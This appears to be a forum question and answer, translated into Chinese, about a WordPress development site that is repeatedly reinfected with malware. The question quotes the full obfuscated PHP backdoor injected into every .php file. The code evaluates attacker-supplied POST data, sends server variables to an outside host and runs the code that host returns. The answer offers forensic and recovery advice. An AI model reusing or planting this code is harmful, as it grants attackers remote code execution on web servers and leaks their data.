我正在一个WordPress网站上工作,每隔X周就会被恶意软件感染,但我们找不到导致此问题的原因。一些背景信息:
该网站位于受密码保护的单独开发域中。在开发过程中,我们会在可用更新时更新软件。发生的情况是,在随机访问几周后,当我们尝试访问该网站时,我们被重定向到了垃圾邮件站点。网站本身在第一次访问时实际上就变得很慢,之后速度又是合理的。我们只有1个管理员帐户,一些编辑在网站上工作,以转移内容。因此,只有少数可信任的人可以访问该网站。
我们的托管公司对恶意软件进行了筛选/扫描,但似乎为时已晚,无法阻止该原因。
我们只安装了少数看起来合法的插件。下面的列表:
所有插件和WordPress本身始终会更新为最新的可用版本。
我们已经安装了tagDiv Newspaper主题版本10.0,但以前的版本也存在问题。在WordPress网站的每次重新安装上,我们都删除了所有文件和整个数据库,并要求托管公司仔细检查是否丢失了文件。我们有其他站点在同一服务器上运行,没有任何问题,因此问题似乎仅限于dev / wordpress站点。在每次清理过程中,我们都重置了所有相关的密码(数据库,ftp)。 tagDiv报纸主题似乎多次成为恶意软件注入的目标,因此这是一个危险信号。不幸的是,已经完成了很多工作,以至于更改主题将是有问题的,而且我不是100%是由主题引起的问题。
在所有* .php文件被感染后,每个.php文件的顶部都有这个额外的php代码:
<?php /*8968665*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KCi8vaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAgICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIsIGZhbHNlICwkY29udGV4dF9qaGtiKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307CiB9CiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*8968665*/ ?><?php
据我所知,数据库似乎未受影响。
在网站的根目录中,创建目录pl时使用文件名PayPAl2019.zip和许多子文件夹,这些子文件夹似乎可以处理某种付款。我可以找到的文件中的IP参考指向ip:^ 64.106.213。*,它属于DataPipe,Inc.
在WordPress目录的根目录中创建的文件是588eqpn7.php,u9hwrd7d.php和shell.php。任何病毒扫描程序都将最后一个文件识别为木马:Trojan:Script / Casur.A!cl。
文件的某些日期戳也很奇怪。例如,2018年,但当时开发站点不存在?
我对服务器的ssh访问权限受到限制,但没有执行某些必要命令的权限,以进行更深入的研究。
我的问题是:
很难从您所讲的内容中了解到底发生了什么。根据密码保护和您的设置,某些情况比其他情况更有可能。如果您使用例如攻击者必须使用Apache的基本身份验证模块,才能绕过该身份验证模块或通过其他方式(在同一台计算机上托管另一台主机,这可能是错误地设置了权限或托管者受到威胁等提示)。如果有应用程序级密码保护(例如,通过WordPress),则可能不会阻止访问某些容易受到攻击的资源。
您描述的“重新感染”可能是由于持久的后门(或未修补的易受攻击的组件)引起的,因此也不容易分辨。
[通常,如果我对安装进行了法证分析,我将从随机命名的文件开始,并查看何时以及使用哪种类型的参数。从那里,我可以暗示攻击者的所作所为,并且也许可以初步了解初始攻击的时间范围。这样,可以轻松恢复到已知良好的备份,而不会浪费很多时间。
在这种情况下,a)重建基础结构(在这种情况下为应用程序),或者如果可用,则b)从已知有效的备份中还原。非常令人震惊的是,有多少托管服务商没有有效的备份或备份不足,以及有多少客户选择了低价而不是(数据)安全性。
为了安全起见,您可以下载安装副本,并在单独的文件夹中重建快速而又肮脏的安装,然后将两个文件夹相互比较并找出差异(这些差异可能来自攻击者,也可能是手动配置/开发的)。这是一个经济问题,涉及您要花费多少时间来重建多少安装。如果您花费的时间太少而攻击者又回来了,那您就不走运了。
...也要进行备份。